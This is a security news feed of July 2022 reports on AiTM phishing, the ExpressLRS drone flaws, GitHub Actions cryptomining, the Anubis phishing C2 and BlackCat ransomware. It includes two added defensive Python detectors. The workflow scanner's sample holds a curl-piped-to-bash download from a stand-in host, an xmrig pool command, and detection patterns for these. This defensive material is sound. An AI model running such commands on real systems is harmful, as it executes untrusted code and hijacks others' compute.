Cyber Security News

Large-scale AiTM phishing campaign targeted +10,000 orgs since 2021

Security Affairs - Wed, 07/13/2022 - 01:56
A large-scale phishing campaign used adversary-in-the-middle (AiTM) phishing sites to hit more than 10,000 organizations

Microsoft observed a large-scale phishing campaign that used adversary-in-the-middle (AiTM) phishing sites to steal passwords, hijack a user’s sign-in session, and bypass the authentication process even when the victim had enabled MFA.

In AiTM phishing, threat actors place a proxy server, the phishing site under their control, between the target user and the legitimate website the user wants to visit. Because every request and response passes through the proxy, the attackers can read the traffic and capture both the target’s password and the session cookie issued after authentication.

Once they had obtained credentials and session cookies giving access to users’ mailboxes, the threat actors launched business email compromise (BEC) campaigns against other targets. Microsoft experts believe that the AiTM phishing campaign has been used to target more than 10,000 organizations since September 2021.

The landing pages used in this campaign were designed to target the Office 365 authentication process by posing as the Office online authentication page. Microsoft researchers noticed that the operators behind this campaign use the Evilginx2 phishing kit as their AiTM infrastructure.

In some of the attacks observed by the experts, threat actors used phishing emails with an HTML file attachment. In order to trick victims into opening the attachment, the message informed the recipients that they had a voice message.

“This redirector acted as a gatekeeper to ensure the target user was coming from the original HTML attachment. To do this, it first validated if the expected fragment value in the URL—in this case, the user’s email address encoded in Base64—exists. If the said value existed, this page concatenated the value on the phishing site’s landing page, which was also encoded in Base64 and saved in the “link” variable” reads the analysis published by Microsoft. “By combining the two values, the succeeding phishing landing page automatically filled out the sign-in page with the user’s email address, thus enhancing its social engineering lure. This technique was also the campaign’s attempt to prevent conventional anti-phishing solutions from directly accessing phishing URLs.”

Once the attackers had captured the session cookie, they injected it into their own browser to skip the authentication process, even if the recipient had enabled MFA on the account.

Microsoft recommends that organizations adopt “phish-resistant” MFA implementations, using solutions that support Fast ID Online (FIDO) v2.0 and certificate-based authentication.

Microsoft also recommends conditional access policies, which are evaluated every time an attacker attempts to use a stolen session cookie, and monitoring for suspicious or anomalous activity, such as sign-in attempts with suspicious characteristics and unusual mailbox activity.
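The session-cookie replay described above leaves a trace that defenders can look for: one session token presented from two different clients. The following added example (not Microsoft’s or Security Affairs’ code) runs that check over a constructed, pipe-separated activity log; the field layout, sample values and severity rule are assumptions.

```python
"""Flag a session cookie that is presented from more than one client.

Added example, not Microsoft's or Security Affairs' code. The input format
is an assumption: one event per line, pipe-separated as
    timestamp|session_id|user|source_ip|user_agent
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import List, NamedTuple, Tuple


class Event(NamedTuple):
    ts: datetime
    session_id: str
    user: str
    ip: str
    user_agent: str


class Finding(NamedTuple):
    session_id: str
    user: str
    origin_client: Tuple[str, str]   # (ip, user agent) that established the session
    other_client: Tuple[str, str]    # a different client presenting the same cookie
    gap: timedelta                   # time from first use to the foreign use
    severity: str                    # "high": IP and browser differ; "low": only one does


# Constructed sample log. Session s-1 is established from one client and then
# presented 22 minutes later from another IP with a different browser, which is
# what a stolen cookie injected into the attacker's browser looks like.
# Session s-3 only changes IP (a user moving between networks): lower severity.
SAMPLE_LOG = """\
2022-07-12T09:01:05|s-1|alice|198.51.100.7|Mozilla/5.0 (Windows NT 10.0) Chrome/103
2022-07-12T09:02:10|s-1|alice|198.51.100.7|Mozilla/5.0 (Windows NT 10.0) Chrome/103
2022-07-12T09:23:40|s-1|alice|203.0.113.55|Mozilla/5.0 (X11; Linux x86_64) Firefox/102
2022-07-12T09:24:01|s-1|alice|203.0.113.55|Mozilla/5.0 (X11; Linux x86_64) Firefox/102
2022-07-12T10:00:00|s-2|bob|192.0.2.14|Mozilla/5.0 (Macintosh) Safari/605
2022-07-12T10:05:00|s-2|bob|192.0.2.14|Mozilla/5.0 (Macintosh) Safari/605
2022-07-12T11:00:00|s-3|carol|192.0.2.20|Mozilla/5.0 (iPhone) Safari/605
2022-07-12T11:30:00|s-3|carol|192.0.2.99|Mozilla/5.0 (iPhone) Safari/605
"""


def parse_log(text: str) -> List[Event]:
    """Parse the constructed log format into time-ordered events."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sid, user, ip, ua = line.split("|", 4)
        events.append(Event(datetime.fromisoformat(ts), sid, user, ip, ua))
    return sorted(events, key=lambda e: e.ts)


def find_cookie_replays(events: List[Event],
                        max_gap: timedelta = timedelta(hours=8)) -> List[Finding]:
    """Report every client, other than the one that established a session,
    that presents that session's cookie within max_gap of the first use."""
    by_session = defaultdict(list)
    for e in events:
        by_session[e.session_id].append(e)

    findings = []
    for sid, evs in by_session.items():
        origin = evs[0]
        origin_client = (origin.ip, origin.user_agent)
        seen = {origin_client}
        for e in evs[1:]:
            client = (e.ip, e.user_agent)
            if client in seen:
                continue
            seen.add(client)
            gap = e.ts - origin.ts
            if gap > max_gap:
                continue
            # Both IP and browser changing is the signature of a replayed cookie;
            # an IP-only change is more often a legitimate network switch.
            both_differ = client[0] != origin_client[0] and client[1] != origin_client[1]
            findings.append(Finding(sid, e.user, origin_client, client, gap,
                                    "high" if both_differ else "low"))
    return findings


if __name__ == "__main__":
    for f in find_cookie_replays(parse_log(SAMPLE_LOG)):
        print(f"[{f.severity}] session {f.session_id} ({f.user}): established from "
              f"{f.origin_client[0]}, reused from {f.other_client[0]} after {f.gap}")
```

In practice such a check is paired with the conditional access policies Microsoft recommends, so that a flagged session is revoked rather than merely logged.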

“This AiTM phishing campaign is another example of how threats continue to evolve in response to the security measures and policies organizations put in place to defend themselves against potential attacks.” concludes the report. “While AiTM phishing attempts to circumvent MFA, it’s important to underscore that MFA implementation remains an essential pillar in identity security. MFA is still very effective at stopping a wide variety of threats; its effectiveness is why AiTM phishing emerged in the first place.”

Follow me on Twitter: @securityaffairs and Facebook


Pierluigi Paganini

(SecurityAffairs – hacking, AiTM phishing)

The post Large-scale AiTM phishing campaign targeted +10,000 orgs since 2021 appeared first on Security Affairs.

Categories: Cyber Security News

Microsoft Releases Fix for Zero-Day Flaw in July 2022 Security Patch Rollout

The Hacker News - Wed, 07/13/2022 - 00:15
Microsoft released its monthly round of Patch Tuesday updates to address 84 new security flaws spanning multiple product categories, counting a zero-day vulnerability that's under active attack in the wild. Of the 84 shortcomings, four are rated Critical, and 80 are rated Important in severity. Also separately resolved by the tech giant are two other bugs in the Chromium-based Edge browser, one
Categories: Cyber Security News

The President of European Central Bank Christine Lagarde targeted by hackers

Security Affairs - Tue, 07/12/2022 - 18:07
Christine Lagarde, the president of the European Central Bank, was the target of a failed hacking attempt.

The European Central Bank confirmed that its President, Christine Lagarde, was the target of a failed hacking attempt.

The European Central Bank revealed that the hacking attempt took place recently, but the good news is that its experts were able to detect and halt it.

“The attempt took place “recently,” the Frankfurt-based central bank for the 19 countries that use the euro said in an emailed response to a query about a report by Business Insider.” reported the Associated Press. “The bank added that “it was identified and halted quickly” but that it had nothing more to say amid an investigation.”

According to Business Insider, threat actors attempted to hack Lagarde’s mobile device by sending her a text message from what appeared to be former German Chancellor Angela Merkel’s cellphone number. The message sent to the ECB told Lagarde that Merkel wanted to communicate with her by WhatsApp, which is considered a more secure channel.

The attack failed because Lagarde was suspicious of the message and contacted Merkel by phone. The threat actors were interested in taking over the accounts of various prominent figures on various messaging services, including WhatsApp.


Pierluigi Paganini

(SecurityAffairs – hacking, ECB)

The post The President of European Central Bank Christine Lagarde targeted by hackers appeared first on Security Affairs.

Categories: Cyber Security News

Flaws in the ExpressLRS Protocol allow the takeover of drones

Security Affairs - Tue, 07/12/2022 - 11:25
The protocol for radio-controlled (RC) drones, named ExpressLRS, is affected by vulnerabilities that can allow device takeover.

Researchers warn of vulnerabilities that affect the protocol for radio-controlled (RC) drones, named ExpressLRS, which can be exploited to take over unmanned vehicles.

ExpressLRS is a high-performance open-source radio control link that provides a low latency radio control link while also achieving maximum range.

According to a bulletin recently published, an attacker can take control of any receiver by observing the traffic from the associated transmitter.

Using only a standard ExpressLRS compatible transmitter, it is possible to take control of any receiver after observing traffic from a corresponding transmitter.

Security issues in the binding phase allow an attacker to extract part of the identifier shared between the receiver and transmitter. Analysis of this part, combined with a brute-force attack, can reveal the remaining part of the identifier. Once the attacker has obtained the complete identifier, they can take over the craft containing the receiver using an ordinary transmitter, without any knowledge of the binding phrase. The attack is feasible entirely in software using standard ExpressLRS-compatible hardware.

“ExpressLRS uses a ‘binding phrase’, built into the firmware at compile time to bind a transmitter to a receiver. ExpressLRS states that the binding phrase is not for security, it is anti-collision.” reads a bulletin published by NCC Group. “Due to weaknesses related to the binding phase, it is possible to extract part of the identifier shared between the receiver and transmitter. A combination of analysis and brute force can be utilised to determine the remaining portion of the identifier. Once the full identifier is discovered, it is then possible to use an attacker’s transmitter to control the craft containing the receiver with no knowledge of the binding phrase. This is possible entirely in software using standard ExpressLRS compatible hardware.”

The binding phrase used by the ExpressLRS protocol is hashed with MD5, an algorithm that is known to be cryptographically broken.

The experts observed that the “sync packets” exchanged between transmitter and receiver at regular intervals for synchronization purposes leak most of the unique identifier (UID) derived from the binding phrase. An attacker can determine the remaining part by brute force, or by observing packets over the air without brute-forcing the sequences.

“Three weaknesses were identified, which allow for the discovery of the four bytes of the required UID to take control of the link. Two of these issues relate to the contents of the sync packet.

  1. The sync packet contains the final three bytes of the UID. These bytes are used to verify that the transmitter has the same binding phrase as the receiver, to avoid collision. Observation of a single sync packet therefore gives 75% of the bytes required to take over the link.
  2. The CRC initialiser uses the final two bytes of the UID sent with the sync packet, making it extremely easy to create a CRC check.” reads the advisory.

The third weakness occurs in the FHSS sequence generation.

  1. Due to weaknesses in the random number generator, the second 128 values of the final byte of the 4 byte seed produce the same FHSS sequence as the first 128.

The advisory recommends not sending the UID over the control link: the data used to generate the FHSS sequence should never be sent over the air. It also recommends improving the random number generator, either by using a more secure algorithm or by adjusting the existing one to work around the repeated sequences.


Pierluigi Paganini

(SecurityAffairs – hacking, drones)

The post Flaws in the ExpressLRS Protocol allow the takeover of drones appeared first on Security Affairs.

Categories: Cyber Security News

TikTok Postpones Privacy Policy Update in Europe After Italy Warns of GDPR Breach

The Hacker News - Tue, 07/12/2022 - 09:04
Popular video-sharing platform TikTok on Tuesday agreed to pause a controversial privacy policy update that could have allowed it to serve targeted ads based on users' activity on the social video platform without their permission to do so. The reversal, reported by TechCrunch, comes a day after the Italian data protection authority — the Garante per la Protezione dei Dati Personali — warned the
Categories: Cyber Security News

Avoiding Death by a Thousand Scripts: Using Automated Content Security Policies

The Hacker News - Tue, 07/12/2022 - 07:28
Businesses know they need to secure their client-side scripts. Content security policies (CSPs) are a great way to do that. But CSPs are cumbersome. One mistake and you have a potentially significant client-side security gap. Finding those gaps means long and tedious hours (or days) in manual code reviews through thousands of lines of script on your web applications. Automated content security
Categories: Cyber Security News

Microsoft announced the general availability of Windows Autopatch feature

Security Affairs - Tue, 07/12/2022 - 05:21
Microsoft announced the general availability of a feature called Autopatch that automatically updates Windows and Office software.

Microsoft announced the general availability of a service called Autopatch that automates the process of managing and rolling out updates to Windows and Office software. The feature is available for Windows Enterprise E3 and E5 licenses, but Windows Education (A3) or Windows Front Line Worker (F3) licenses are not covered.

Microsoft first announced the feature in March 2022. It aims to improve the patch management process in enterprises, which are exposed to cyber-attacks when they fail to install the available patches and upgrades.

Microsoft announced that it will continue to roll out Patch Tuesday security updates and that Autopatch will help “streamline updating operations and create new opportunities for IT pros.”

A robust update process relies on deployment rings. Windows Autopatch dynamically creates four testing rings, each representative of the diversity of devices in an enterprise. Updates are first tested on a small set of devices; if the installation causes no problems, the rollout is extended to increasingly larger sets, with an evaluation period at each step.

“The ‘test ring’ contains a minimum number of representative devices. The ‘first’ ring is slightly larger, containing about 1% of all devices under management. The ‘fast’ ring contains about 9% of endpoints, with the rest assigned to the ‘broad’ ring.” continues the announcement.

“Windows Autopatch aims to keep at least 95% of eligible devices on the latest Windows quality update 21 days after release,” states Microsoft. “When running an expedited release, the regular goal […] no longer applies. Instead, Windows Autopatch greatly accelerates the release schedule of the release to update the environment more quickly.”

Microsoft also published a FAQ page and documentation that provide additional information on how Windows Autopatch works.


Pierluigi Paganini

(SecurityAffairs – hacking, Microsoft autopatch)

The post Microsoft announced the general availability of Windows Autopatch feature appeared first on Security Affairs.

Categories: Cyber Security News

Cloud-Based Cryptocurrency mining attacks abuse GitHub Actions and Azure VM

Security Affairs - Tue, 07/12/2022 - 03:26
Researchers investigated cloud-based cryptocurrency mining attacks targeting GitHub Actions and Azure VMs.

Researchers from Trend Micro published a report that details cloud-based cryptocurrency mining attacks targeting GitHub Actions and Azure VMs and the threat actors behind them.

Threat actors are attempting to compromise a large number of cloud-based systems to mine cryptocurrency, with a significant impact on target organizations in terms of resource consumption and cost.

To demonstrate the impact on organizations, Trend Micro researchers deployed the Monero miner XMRig on one of their systems and observed an increase in CPU utilization from an average of 13% to 100%. This means that the cost of electricity to the target organization jumped from US$20 up to US$130 per month (+600%) for a single cloud instance. Considering that organizations usually run multiple cloud instances, the economic impact on them increases dramatically.

Experts pointed out that an infrastructure infected with a miner slows down, which can disrupt a business’s online services and damage the organization’s reputation.

“Cryptocurrency-mining groups enter cloud deployments through similar methods, typically through the exploitation of a security flaw within target systems, such as an unpatched vulnerability, weak credentials, or a misconfigured cloud implementation.” states the report published by Trend Micro. “However, each group more or less has its unique traits, from its skill level and experience to the tools and techniques it uses, that set it apart from other groups.”

For example, the Outlaw group, which has been active since at least 2018, uses brute force and SSH-based exploitation (of the Shellshock flaw and the Drupalgeddon2 vulnerability) to gain remote access to target systems, including servers and IoT devices. The main component of its implant is a variant of “Shellbot”, a Monero miner bundled with a Perl-based backdoor that includes an IRC-based bot and an SSH scanner.

Another group, tracked as TeamTNT, compromises hosts by exploiting vulnerable software services and then steals credentials for other services in order to move to other hosts. In November, Trend Micro researchers reported that TeamTNT was targeting poorly configured Docker servers exposing Docker REST APIs as part of an ongoing campaign that started in October.

Threat actors were executing malicious scripts to deploy Monero cryptocurrency miners, perform container-to-host escape using well-known techniques, and scan the Internet for exposed ports from other compromised containers.

In its latest article, Trend Micro detailed how attackers are leveraging GitHub Actions (GHAs) and Azure virtual machines (VMs) for cloud-based cryptocurrency mining. The experts observed threat actors abusing the runners, the servers GitHub provides to run an organization’s pipelines and automation, by downloading and installing their miners on them. The report also analyzes different GHA YAML scripts found on GitHub that tried to mine all kinds of cryptocurrency using the GHA runners.

GHA allows users to automate the software build, test, and deployment pipeline.

The experts pointed out that Linux and Windows runners are hosted on Standard_DS2_v2 virtual machines on Azure and come with two vCPUs and 7GB of memory.

The experts have identified over a thousand repositories and more than 550 code samples that are abusing GitHub Actions as a part of a cryptocurrency mining campaign leveraging GitHub runners.

“For as long as the malicious actors only use their own accounts and repositories, end users should have no cause for worry. Problems arise when these GHAs are shared on GitHub Marketplace or used as a dependency for other Actions.” reads the report.

The report also provides recommendations on how to detect cryptocurrency miners along with indicators of compromise for known cryptocurrency mining campaigns.
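The abuse pattern described above, a workflow that downloads a miner onto a hosted runner and keeps the runner busy, can be screened for before a workflow is merged or published. The following added example is not Trend Micro’s or GitHub’s code; its rules, weights and both sample workflows are constructed assumptions, so it is a triage heuristic rather than a verdict.

```python
"""Heuristic scan of a GitHub Actions workflow for crypto-mining abuse.

Added example (not Trend Micro's or GitHub's code). The rules, their weights
and both sample workflows are constructed for illustration. They cover the
behaviours described in the article: fetching and running a miner on a
hosted runner, and holding runners (long timeouts, frequent cron, wide
matrices) so that the mining job keeps getting fresh compute.
"""
import re
from typing import Dict, List, NamedTuple


class Finding(NamedTuple):
    line_no: int
    rule: str
    text: str


# (rule name, pattern matched against each line, weight towards the verdict)
RULES = [
    ("miner_binary", r"\b(xmrig|minerd|cpuminer|nbminer|t-rex|ethminer)\b", 5),
    ("stratum_pool", r"stratum\+(tcp|ssl)://", 5),
    ("miner_flags", r"--(donate-level|algo|rig-id)\b", 3),
    ("remote_exec", r"\b(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b", 2),
    ("hide_output", r"(\bnohup\b|\bdisown\b|>\s*/dev/null\s+2>&1\s*&)", 1),
    # timeout-minutes of 300 or more: the job is meant to hold the runner
    ("long_timeout", r"timeout-minutes:\s*([3-9]\d{2}|\d{4,})\b", 2),
    # a cron schedule firing every few minutes keeps fresh runners coming
    ("fast_cron", r"cron:\s*['\"]?\*/\d+ \* \* \* \*", 2),
    # a matrix list with ten or more entries fans one job out to many runners
    ("matrix_fanout", r"\[\s*(?:[^\]\n,]+,\s*){9,}[^\]\n]+\]", 2),
]
COMPILED = [(name, re.compile(pat, re.I), weight) for name, pat, weight in RULES]
WEIGHTS: Dict[str, int] = {name: weight for name, _, weight in RULES}
SUSPICIOUS_THRESHOLD = 5

# Constructed workflow showing the abuse pattern: fast cron, long timeout,
# wide matrix, remote script piped to a shell, miner binary with pool URL.
SUSPICIOUS_WORKFLOW = """\
name: build
on:
  schedule:
    - cron: '*/5 * * * *'
jobs:
  test:
    runs-on: ${{ matrix.os }}
    timeout-minutes: 360
    strategy:
      matrix:
        os: [ubuntu-20.04, ubuntu-22.04, windows-2019, windows-2022, macos-11, macos-12, ubuntu-latest, windows-latest, macos-latest, ubuntu-18.04]
    steps:
      - run: curl -sL http://example.invalid/setup.sh | bash
      - run: ./xmrig -o stratum+tcp://pool.example.invalid:3333 --donate-level=0 > /dev/null 2>&1 &
"""

# Constructed ordinary CI workflow, expected to produce no findings.
BENIGN_WORKFLOW = """\
name: ci
on: [push, pull_request]
jobs:
  test:
    runs-on: ubuntu-latest
    timeout-minutes: 20
    steps:
      - uses: actions/checkout@v3
      - run: make test
"""


def scan_workflow(text: str) -> List[Finding]:
    """Return one Finding per (line, rule) hit, in file order."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for name, pattern, _ in COMPILED:
            if pattern.search(line):
                findings.append(Finding(line_no, name, line.strip()))
    return findings


def score(findings: List[Finding]) -> int:
    """Sum the weights of all hits; single strong indicators dominate."""
    return sum(WEIGHTS[f.rule] for f in findings)


def is_suspicious(text: str) -> bool:
    return score(scan_workflow(text)) >= SUSPICIOUS_THRESHOLD


if __name__ == "__main__":
    for name, wf in (("suspicious", SUSPICIOUS_WORKFLOW), ("benign", BENIGN_WORKFLOW)):
        hits = scan_workflow(wf)
        print(f"{name}: score={score(hits)} suspicious={is_suspicious(wf)}")
        for f in hits:
            print(f"  line {f.line_no:>2} {f.rule:<14} {f.text}")
```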


Pierluigi Paganini

(SecurityAffairs – hacking, cryptocurrency mining)

The post Cloud-Based Cryptocurrency mining attacks abuse GitHub Actions and Azure VM appeared first on Security Affairs.

Categories: Cyber Security News

Microsoft Windows Autopatch is Now Generally Available for Enterprise Systems

The Hacker News - Tue, 07/12/2022 - 01:33
Microsoft on Monday announced the general availability of a feature called Autopatch that automatically keeps Windows and Office software up-to-date on enrolled endpoints. The launch, which comes a day before Microsoft is expected to release its monthly round of security patches, is available for customers with Windows Enterprise E3 and E5 licenses. It, however, doesn't support Windows Education
Categories: Cyber Security News

Cloud-based Cryptocurrency Miners Targeting GitHub Actions and Azure VMs

The Hacker News - Mon, 07/11/2022 - 13:13
GitHub Actions and Azure virtual machines (VMs) are being leveraged for cloud-based cryptocurrency mining, indicating sustained attempts on the part of malicious actors to target cloud resources for illicit purposes. "Attackers can abuse the runners or servers provided by GitHub to run an organization's pipelines and automation by maliciously downloading and installing their own cryptocurrency
Categories: Cyber Security News

A fake job offer via LinkedIn allowed to steal $540M from Axie Infinity

Security Affairs - Mon, 07/11/2022 - 10:42
Threat actors used a fake job offer on LinkedIn to target an employee of Axie Infinity, which resulted in the theft of $540 million.

In March, threat actors stole almost $625 million in Ethereum and USDC (a U.S. dollar pegged stablecoin) tokens from Axie Infinity’s Ronin network bridge. The attack took place on March 23rd, but the cyber heist was discovered after a user was unable to withdraw 5,000 ether.

The Ronin Network is an Ethereum-linked sidechain used for the blockchain game Axie Infinity.

The attackers stole roughly 173,600 ether and 25.5 million USDC. The Ronin bridge and Katana Dex were halted following the attack.

Axie Infinity disclosed the security breach through its official Discord and Twitter accounts and through Ronin Network.

Now a report from The Block, citing two people familiar with the matter, reveals that the threat actors targeted a senior engineer at the company with a fake job offer via LinkedIn.

“According to two people with direct knowledge of the matter, who were granted anonymity due to the sensitive nature of the incident, a senior engineer at Axie Infinity was duped into applying for a job at a company that, in reality, did not exist.” reads the report published by The Block. “Earlier this year, staff at Axie Infinity developer Sky Mavis were approached by people purporting to represent the fake company and encouraged to apply for jobs, according to the people familiar with the matter. One source added that the approaches were made through the professional networking site LinkedIn.”

The attackers offered a job with an extremely generous compensation package to a Sky Mavis engineer.

A PDF containing the offer was sent to the employee; once he opened the file, spyware compromised his system and gave the attackers a foothold in Ronin’s network. Once inside the company infrastructure, the threat actors were able to take over four of the nine validators on the Ronin network.

“Employees are under constant advanced spear-phishing attacks on various social channels and one employee was compromised. This employee no longer works at Sky Mavis. The attacker managed to leverage that access to penetrate Sky Mavis IT infrastructure and gain access to the validator nodes.” reads a post-mortem analysis published by Sky Mavis.

In April, the U.S. government blamed North Korea-linked APT Lazarus for the Ronin Validator cyber heist.

The U.S. Treasury announced in a notice the sanctions against the Ethereum address used by the North Korea-linked APT to receive the stolen funds. US organizations are forbidden from conducting any transactions with that address.


Pierluigi Paganini

(SecurityAffairs – hacking, Zyxel)

The post A fake job offer via LinkedIn allowed to steal $540M from Axie Infinity appeared first on Security Affairs.

Categories: Cyber Security News

What It Takes to Tackle Your SaaS Security

The Hacker News - Mon, 07/11/2022 - 08:29
It's not a new concept that Office 365, Salesforce, Slack, Google Workspace or Zoom, etc., are amazing for enabling the hybrid workforce and hyper-productivity in businesses today. However, there are three main challenges that have arisen stemming from this evolution: (1) While SaaS apps include a host of native security settings, they need to be hardened by the security team of the organization
Categories: Cyber Security News

Anubis Networks is back with new C2 server

Security Affairs - Mon, 07/11/2022 - 06:42
A large-scale phishing campaign leveraging the Anubis Network has been targeting Brazil and Portugal since March 2022.

A large-scale phishing campaign has been targeting Internet end users in Brazil and Portugal since March 2022. Anubis Network is a C2 portal developed to control fake portals; its goal is to steal credentials that give full access to the real systems.

This C2 server is controlled by a group of operators already seen in the previous analysis in 2022, with the various targeted brands divided among the operators of the group (in a call-center modus operandi).

This campaign was first highlighted by Segurança Informática in 2020, and the high-level diagram of this new campaign is shown below.

Figure 1: High-level diagram of the ANUBIS phishing network and its components (2020).

In detail, this fresh campaign is composed of three crucial operating components:

  • the delivery vehicle to propagate the landing page in the wild; usually carried out through smishing (SMS) and phishing (email)
  • a malicious landing page hosted on a cloud server, composed of a user interface and layout very similar to the real system
  • an operation back-end that allows criminals to manage the details of users who have fallen into the trap.

Figure 2 presents an example of an SMS sent to Internet end-users during the ANUBIS social engineering wave. The image is related to an ongoing campaign in Portugal impersonating a specific organization to steal banking credentials.

Figure 2: Example of SMS sent during the social engineering wave.

SMSs are sent based on a list created by the C2 owner, namely: 1kk-rusha-01.txt.

Fake domains hosted automatically on Cloudflare CDN

The ANUBIS network phishing campaigns are masked behind the Cloudflare CDN. Operators can easily set this up through an interface that uses the Cloudflare API to configure new DNS zones.

Figure 3: Feature of adding new domains and configuring them behind the Cloudflare CDN via the ANUBIS back office portal.

The Phishing template

One of the last campaigns disseminated by criminals is impersonating a popular service in Portugal with the goal of stealing credentials of home banking portals.

After clicking on the link distributed via smishing, the victims are redirected to a specific landing page that collects the mobile phone number and the associated code (PIN). As observed, criminals are using the Let’s Encrypt CA to obtain valid HTTPS certificates.


Figure 4: Phishing template of ANUBIS Network campaign.

After the victim clicks “CONTINUAR”, a new page is presented. Additional data about the victim is requested by the server side and stored in session cookies.

Figure 5: Additional details about the victims are stored on the session cookies.

As observed, 12 target banks operating in Portugal are listed in this specific campaign.

Figure 6: Target banks present on the Anubis Network campaign in Portugal.

In the next step, credentials to access the target portals are requested.

Figure 7: Credentials to access the real systems are requested.

Additional details related to credit cards are also requested by criminals. A specific loading page is then presented, and ANUBIS operators can request other details via the C2 portal in a call center modus operandi.

Figure 8: Additional information requested by criminals.

Anubis Network C2 Panel

By analyzing the landing page source code, the URL of the C2 server can be obtained.

Figure 9: Endpoint of the Anubis Network C2 server present on the source code.

As observed, the C2 login page is linked to a legitimate system in order to confuse threat analysts.

Figure 10: Login page of Anubis Network C2 server.

The features observed inside the C2 server are very similar to those in the analysis performed in 2020. Operators can control the whole infection flow, requesting additional details from the victim while accessing the real system in the background.

Figure 10: Internal pages where Anubis Network operators can control all the malicious flow.

In detail, global administrators are capable of adding users to specific target organizations as observed below.

Figure 11: Anubis Network operators and permissions page with the target organizations.

According to the MySQL database that supports the system, there are 77 operators in the system – which represents the business and operational volume of this malicious scheme.

An interesting feature also implemented in this new version of the C2 portal is the email temp. By using this feature, criminals can create new domains and use internal emails to manage all the processes.

Figure 12: Anubis Network email temp feature.

The landing pages presented to the victims and specific data can be configured on the Anubis Network administrative portal. The path of the folder and the target brand can be observed on this specific page.

Figure 13: Target organizations of Anubis Network C2 server – July 2022.

Since the malicious network is made up of many people, a channel on Telegram was created in order to provide technical support to operators in the performance of their duties.

Figure 14: Telegram channel created as a technical support channel.

The MySQL database

The heart of the ANUBIS network is a MySQL database. This database is used for data synchronization between all components of the malicious ecosystem and maintains everything up-to-date each second.

Figure 15: Database schema of the ANUBIS phishing network.

Additional details, including final thoughts and Indicators of Compromise (IoCs), are available in the original analysis published by Pedro Tavares:

https://seguranca-informatica.pt/anubis-networks-is-back-with-new-c2-server/#.Ysv53XZBy5d

About the author: Pedro Tavares

Pedro Tavares is a professional in the field of information security working as an Ethical Hacker, Malware Analyst and also a Security Evangelist. He is also a founding member and Pentester at CSIRT.UBI and founder of the computer security blog seguranca-informatica.pt.


Pierluigi Paganini

(SecurityAffairs – hacking, Anubis)

The post Anubis Networks is back with new C2 server appeared first on Security Affairs.

Categories: Cyber Security News

BlackCat (aka ALPHV) Ransomware is Increasing Stakes up to $2,5M in Demands

Security Affairs - Mon, 07/11/2022 - 05:27
The BlackCat (aka ALPHV) ransomware gang has introduced an advanced search across stolen victims’ passwords and confidential documents.

The notorious cybercriminal syndicate BlackCat competes with Conti and LockBit 3.0. It has introduced an advanced search across stolen victims’ passwords and confidential documents leaked on the Tor network.

Resecurity (USA), a Los Angeles-based cybersecurity company protecting Fortune 500 companies, has detected a significant increase in the value of ransom demands by the notorious BlackCat ransomware gang. According to experts, the syndicate actively competes with Conti and the updated LockBit 3.0, and recently introduced a search across stolen victims’ passwords and confidential documents leaked on the Tor network.

Based on the observed recently compromised victims based in the Nordics region (which haven’t been disclosed by the group yet) the amount to be paid exceeds $2 million. One of the tactics used offers close to 50% discount to the victim in the case they are willing to pay – several ransom demands valued at $14 million were decreased to $7 million, but such amounts are still complicated for enterprises facing cybersecurity incidents. The most common ransom demand practiced by BlackCat jumped up to $2.5 million and it seems its trajectory will only grow.

The average ransomware payment climbed 82% since 2020 to a record high of $570,000 in the first half of 2021, and by 2022 it had almost doubled. The latest forecast is for global ransomware extortion activity to reach $265 billion by 2031, with total damages for businesses valued at $10.5 trillion globally. These metrics indicate that ransomware is the world’s largest “shadow economy”, generating more damage than natural disasters.

BlackCat has been operating since at least November 2021, and launched major attacks in January to disrupt OilTanking GmbH, a German fuel company, and in February 2022, the attack on an aviation company, Swissport. The group is targeting high-profile businesses in critical industries including energy, financial institutions, legal services, and technology.

BlackCat ransomware is one of the fastest-growing Ransomware-as-a-Service (RaaS) underground groups practicing so-called “quadruple extortion”, pressing victims to pay by combining encryption, data theft, denial of service (DoS) and harassment.

BlackCat is also known as “ALPHV”, “AlphaVM” or “AphaV”, and is a ransomware family written in the Rust programming language. The group’s leader, who uses the same alias in communications on Dark Web forums, described Rust as one of the competitive advantages of their locker compared to LockBit and Conti. Although BlackCat and ALPHV use completely different URLs on the Tor network, the scripting used on their pages is identical and was likely developed by the same actors. Both projects use an advanced set of JS-based obfuscation to protect the page from analysis, managed by three scripts written in the same way.

The group pioneered search over indexed stolen data, allowing customers and employees of the affected companies to check whether their data was exposed.

Such an approach serves as a catalyst for further class-action lawsuits, which could be filed by unhappy individuals who see their data or communications exposed because of a breach. In a Dark Web post from 10 Jul 2022, 15:35, “ALPHV” introduced search not only by text signatures but also by tags for passwords and compromised PII. It seems that some of the stolen files are still being indexed, but the majority is already available for quick navigation. Over 2,270 indexed documents were identified containing access credentials and password information in plaintext, and over 100,000 documents carried confidential markings, including indexed e-mail communications and sensitive attachments.

ALPHV seems to be competing hard with LockBit 3.0 and Conti, two other actively developing ransomware syndicates, which have called ALPHV “scammers”. The statement is likely related to a conflict between affiliates and team members who could have been associated with both projects at different stages.

ALPHV has been associated with two other ransomware groups: DarkSide and BlackMatter. Design overlaps between ALPHV and DarkSide have prompted rumors that ALPHV was a rebrand of DarkSide. On underground cybercriminal forums, the representative of the “LockBit” ransomware also initiated threads stating that ALPHV was a rebrand of DarkSide and BlackMatter RaaS programs. While ALPHV denied being a rebrand of DarkSide or BlackMatter, developers and money launderers from ALPHV are linked to DarkSide/BlackMatter, according to the FBI. Therefore, while ALPHV may not be a rebrand, it is likely that the group recruited many members from these now inactive ransomware gangs.

Today the group published new victims: “COUNT+CARE” GmbH (an information technology and services company from Germany), following the Dusit D2 Kenz Hotel in Dubai, Sinclair Wilson (an accounting and wealth management services firm from Australia) and Adler Display of Baltimore, Maryland.

Additional info is available in the post published by Resecurity on its blog:

https://resecurity.com/blog/article/blackcat-aka-alphv-ransomware-is-increasing-stakes-up-to-25m-in-demands


Pierluigi Paganini

(SecurityAffairs – hacking, BlackCat)

The post BlackCat (aka ALPHV) Ransomware is Increasing Stakes up to $2,5M in Demands appeared first on Security Affairs.

Categories: Cyber Security News

Experts warn of the new 0mega ransomware operation

Security Affairs - Mon, 07/11/2022 - 03:50
BleepingComputer reported a new ransomware operation named 0mega that is targeting organizations worldwide.

0mega is a new ransomware operation that is targeting organizations worldwide using a double-extortion model, BleepingComputer reported.

